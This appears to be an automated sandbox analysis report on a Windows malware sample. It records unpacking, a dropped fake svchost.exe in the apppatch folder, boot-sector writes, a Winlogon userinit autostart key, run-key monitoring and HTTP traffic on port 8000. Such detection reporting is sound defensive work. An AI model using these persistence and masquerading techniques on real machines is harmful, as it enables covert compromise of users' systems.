Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbcom.lyxynejpS source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbRSDS0B source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.2615235923.0000000002F05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wkernelbase.pdbe86303.dscx.akamaiedge.net source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb\* source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernelbase.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2604726321.0000000000848000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2622345963.0000000006F7B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdb source: svchost.exe, 00000002.00000002.2626765439.0000000008B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626024029.0000000008B54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.2617654606.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1827672077.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1727427043.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1827636653.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000000.1743054464.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000000.1771298609.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000000.1782573513.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000000.1785980185.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000000.1812207683.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1908463497.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000000.1834505436.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000000.1851337162.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000024.00000000.1879363277.000000000033E000.00000002.00000001.01000000.00000009.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000027.00000002.2033250591.000000000033E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdbb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\winsta.pdb\*b source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.2624819557.0000000008ACF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2636696382.000000000D749000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\winsta.pdb source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\lygyvon.comp source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\WinSCard.pdb* source: svchost.exe, 00000002.00000003.2597809390.0000000008B70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2620449428.0000000004493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wrpcrt4.pdb\??\C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb* source: svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb( source: svchost.exe, 00000002.00000002.2626024029.0000000008B49000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\uavINoSIQh.exeUnpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.dHGmL:R;.lzmjSu:W;.YOSWO:R;.sTDEgl:R;.fwQO:R;.L:W;.D:W;.data:W;.kubC:W;.hkw:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.2640000.5.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.unpack
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeUnpacked PE file: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\uavINoSIQh.exeUnpacked PE file: 0.2.uavINoSIQh.exe.400000.1.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: uavINoSIQh.exeStatic PE information: real checksum: 0x6d9c86ef should be: 0x410a0
Source: svchost.exe.0.drStatic PE information: real checksum: 0x2563a9cf should be: 0x410a0
Source: uavINoSIQh.exeStatic PE information: section name: .dHGmL
Source: uavINoSIQh.exeStatic PE information: section name: .lzmjSu
Source: uavINoSIQh.exeStatic PE information: section name: .YOSWO
Source: uavINoSIQh.exeStatic PE information: section name: .sTDEgl
Source: uavINoSIQh.exeStatic PE information: section name: .fwQO
Source: uavINoSIQh.exeStatic PE information: section name: .L
Source: uavINoSIQh.exeStatic PE information: section name: .D
Source: uavINoSIQh.exeStatic PE information: section name: .kubC
Source: uavINoSIQh.exeStatic PE information: section name: .hkw
Source: svchost.exe.0.drStatic PE information: section name: .dHGmL
Source: svchost.exe.0.drStatic PE information: section name: .lzmjSu
Source: svchost.exe.0.drStatic PE information: section name: .YOSWO
Source: svchost.exe.0.drStatic PE information: section name: .sTDEgl
Source: svchost.exe.0.drStatic PE information: section name: .fwQO
Source: svchost.exe.0.drStatic PE information: section name: .L
Source: svchost.exe.0.drStatic PE information: section name: .D
Source: svchost.exe.0.drStatic PE information: section name: .kubC
Source: svchost.exe.0.drStatic PE information: section name: .hkw
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225016A push ds; ret 0_2_0225016B
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225063D push ds; ret 0_2_022505F1
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_0225063D push ebx; ret 0_2_02250677
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_02250678 push dword ptr [esp+48h]; ret 0_2_02250747
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022504C7 push ds; ret 0_2_022504E6
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022505A1 push ds; ret 0_2_022505F1
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_022505A1 push ebx; ret 0_2_02250677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02688B69 push cs; iretd 2_2_02688B78
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02688B33 push cs; ret 2_2_02688B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0268849D push es; iretd 2_2_026884AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02684DE0 push eax; ret 2_2_02684E0E
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_024868D2 push ebp; retf 2_2_024868D3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0249989D push es; iretd 2_2_024998AC
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02496895 push cs; retf 0004h2_2_024968F5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_024961E0 push eax; ret 2_2_0249620E

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_026533F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_013333F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_013F33F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_015233F0
Drops PE files with benign system names
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\uavINoSIQh.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403560
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_026533F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_013333F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_013F33F0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u8_2_015233F0
Creates an undocumented autostart registry key
Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
Monitors registry run keys for changes
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Moves itself to temp directory
Source: c:\users\user\desktop\uavinosiqh.exeFile moved: C:\Users\user\AppData\Local\Temp\9648.tmpJump to behavior
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_0264D300
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02649ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02649ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CFE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CFE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_0264CD50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CDC0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CDC0
